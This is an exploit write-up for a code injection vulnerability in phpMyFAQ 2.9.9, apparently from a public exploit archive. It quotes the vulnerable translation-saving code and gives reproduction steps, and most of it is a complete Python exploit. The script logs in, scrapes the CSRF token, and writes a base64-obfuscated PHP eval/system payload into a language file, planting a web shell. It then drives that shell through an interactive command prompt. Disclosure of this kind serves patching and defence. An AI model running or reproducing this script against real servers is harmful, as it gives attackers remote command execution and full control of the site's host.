# Exploit Title: [PHPMYFAQ 2.9.9 Code Injection] # Google Dork: [NA] # Date: [Nov 6 2017] # Exploit Author: [tomplixsee] # Author blog : [cupuzone.wordpress.com] # Vendor Homepage: [ http://www.phpmyfaq.de] # Software Link: [http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip] # Version: [2.9.9] # Tested on: [Ubuntu Server 16.04, PHP 7.0.22] # CVE : [NA] How to reproduce 1. login to administrative page (example http://vbox-ubuntu-server.me/phpmyfaq/admin/ ) as an admin or any user with right access to edit translation 2. open page configuration->interface translation (assume you use english language). fyi, edit translations only active if folder phpmyfaq/lang is writable, so make sure the folder is writable 3. choose indonesia (or another language) to edit 4. choose page 14 (in example) 5. choose variable LANG_CONF[main.metaDescription] 6. set phpinfo() as value 7. change your languge to indonesia vulnerable code on file admin/ajax.trans.php 43 case 'save_page_buffer': 44 /* 45 * Build language variable definitions 46 * @todo Change input handling using PMF_Filter 47 */ 48 foreach ((array) @$_POST['PMF_LANG'] as $key => $val) { 49 if (is_string($val)) { 50 $val = str_replace(array('\\\\', '\"', '\\\''), array('\\', '"', "'"), $val); 51 $val = str_replace("'", "\\'", $val); 52 $_SESSION['trans']['rightVarsOnly']["PMF_LANG[$key]"] = $val; 53 } elseif (is_array($val)) { 54 /* 55 * Here we deal with a two dimensional array 56 */ 57 foreach ($val as $key2 => $val2) { 58 $val2 = str_replace(array('\\\\', '\"', '\\\''), array('\\', '"', "'"), $val2); 59 $val2 = str_replace("'", "\\'", $val2); 60 $_SESSION['trans']['rightVarsOnly']["PMF_LANG[$key][$key2]"] = $val2; 61 } 62 } 63 } 64 65 foreach ((array) @$_POST['LANG_CONF'] as $key => $val) { 66 // if string like array(blah-blah-blah), extract the contents inside the brackets 67 if (preg_match('/^\s*array\s*\(\s*(\d+.+)\s*\).*$/', $val, $matches1)) { 68 // split the resulting string of delimiters such as "number =>" 69 $valArr = preg_split( 70 '/\s*(\d+)\s*\=\>\s*/', 71 $matches1[1], 72 null, 73 PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY 74 ); 75 $numVal = count($valArr); 76 if ($numVal > 1) { 77 $newValArr = []; 78 for ($i = 0; $i < $numVal; $i += 2) { 79 if (is_numeric($valArr[$i])) { 80 // clearing quotes 81 if (preg_match('/^\s*\\\\*[\"|\'](.+)\\\\*[\"|\'][\s\,]*$/', $valArr[$i + 1], $matches2)) { 82 $subVal = $matches2[1]; 83 // normalize quotes 84 $subVal = str_replace(array('\\\\', '\"', '\\\''), array('\\', '"', "'"), $subVal); 85 $subVal = str_replace("'", "\\'", $subVal); 86 // assembly of the original substring back 87 $newValArr[] = $valArr[$i].' => \''.$subVal.'\''; 88 } 89 } 90 } 91 $_SESSION['trans']['rightVarsOnly']["LANG_CONF[$key]"] = 'array('.implode(', ', $newValArr).')'; 92 } 93 } else { // compatibility for old behavior 94 $val = str_replace(array('\\\\', '\"', '\\\''), array('\\', '"', "'"), $val); 95 $val = str_replace("'", "\\'", $val); 96 $_SESSION['trans']['rightVarsOnly']["LANG_CONF[$key]"] = $val; 97 } 98 } 99 100 echo 1; 101 break; 102 103 case 'save_translated_lang': 104 105 if (!$user->perm->checkRight($user->getUserId(), 'edittranslation')) { 106 echo $PMF_LANG['err_NotAuth']; 107 exit; 108 } 109 110 $lang = strtolower($_SESSION['trans']['rightVarsOnly']['PMF_LANG[metaLanguage]']); 111 $filename = PMF_ROOT_DIR.'/lang/language_'.$lang.'.php'; 112 113 if (!is_writable(PMF_ROOT_DIR.'/lang')) { 114 echo 0; 115 exit; 116 } 117 118 if (!copy($filename, PMF_ROOT_DIR.'/lang/language_'.$lang.'.bak.php')) { 119 echo 0; 120 exit; 121 } 122 123 $newFileContents = ''; 124 $tmpLines = []; 125 126 // Read in the head of the file we're writing to 127 $fh = fopen($filename, 'r'); 128 do { 129 $line = fgets($fh); 130 array_push($tmpLines, rtrim($line)); 131 } while ('*/' != substr(trim($line), -2)); 132 fclose($fh); 133 134 // Construct lines with variable definitions 135 foreach ($_SESSION['trans']['rightVarsOnly'] as $key => $val) { 136 if (0 === strpos($key, 'PMF_LANG')) { 137 $val = "'$val'"; 138 } 139 array_push($tmpLines, '$'.str_replace(array('[', ']'), array("['", "']"), $key)." = $val;"); 140 } 141 142 $newFileContents .= implode("\n", $tmpLines); 143 144 unset($_SESSION['trans']); 145 146 $retval = file_put_contents($filename, $newFileContents); 147 echo intval($retval); 148 break; the exploit ----------------------------------------------------------------- #! /usr/bin/python import sys, requests, argparse, readline def main(argv): global url, user, password parser = argparse.ArgumentParser(description='PHPMYFAQ 2.9.9 Code Injection exploitation tool. author : tomplixsee') parser.add_argument('-u','--url', help='target url',required=True) parser.add_argument('-p','--password', help='password',required=True) parser.add_argument('-s','--user', help='user',required=True) args = parser.parse_args() url = args.url user = args.user password = args.password if __name__ == "__main__": main(sys.argv[1:]) #get the cookie def login(): global url, user, password,cookie print "\033[1;33m>>>>>> logging in\033[1;m" data = {"faqusername":user,"faqpassword":password} headers = { } r = requests.post(url+"/admin/index.php", headers=headers, data=data) if "dashboard" in r.text: print "\033[1;32m>>>>>> login sucessful\033[1;m" cookie = r.cookies["PHPSESSID"] check() else: print "login failed" sys.exit() #check if user has access to edit translations. #get the crsf token def check(): global url,cookie, csrf print "\033[1;33m>>>>>> check user auth\033[1;m" headers = { 'Accept': '*/*', "Cookie":"PHPSESSID="+cookie } r = requests.get(url+"/admin/index.php?action=transedit&translang=id", headers=headers) if ("You are not authorized." not in r.text) or ("ajaxaction=save_translated_lang&csrf" in r.text): print "\033[1;32m>>>>>> authorized\033[1;m" else: print "not authorized" sys.exit() #get csrf token str_csrf = r.text.split("action=ajax&ajax=trans&ajaxaction=save_translated_lang&csrf=" ) csrf = str_csrf[1][0:40] savebuffer() #save payload to session def savebuffer(): global url,cookie, csrf print "\033[1;33m>>>>>> trying to fill the buffer\033[1;m" headers = { 'Accept': '*/*', "Cookie":"PHPSESSID="+cookie } data = { "LANG_CONF[main.metaDescription]":'eval(base64_decode(\"c3lzdGVtKCRfUkVRVUVTVFtxXSk7IGlmKGlzc2V0KCRfUkVRVUVTVFttYXRpXSkpZGllOw==\"))' } r = requests.post(url+"/admin/index.php?action=ajax&ajax=trans&ajaxaction=save_page_buffer&csrf="+csrf, headers=headers, data=data) if r.text=="1": print "\033[1;32m>>>>>> success\033[1;m" write2file() else: sys.exit() #write payload to file def write2file(): global url,cookie, csrf print "\033[1;33m>>>>>> write payload to server\033[1;m" headers = { 'Accept': '*/*', "Cookie":"PHPSESSID="+cookie } data = {} r = requests.post(url+"/admin/index.php?action=ajax&ajax=trans&ajaxaction=save_translated_lang&csrf="+csrf, headers=headers, data=data) if r.text!="": print "\033[1;32m>>>>>> success\033[1;m" print "\033[1;32m>>>>>> enjoy your shell\033[1;m" exploit('') else: sys.exit() #send system command def exploit(command): global url,cookie command = raw_input('\033[1;31mshell > \033[1;m') if command == "exit": print "goodbye" sys.exit() headers = { 'Accept': '*/*', "Cookie":"PHPSESSID="+cookie } data = {"q":command, "mati":"mati", "language":"id" } r = requests.post(url+"/admin/index.php", headers=headers, data=data) print r.text exploit('') login()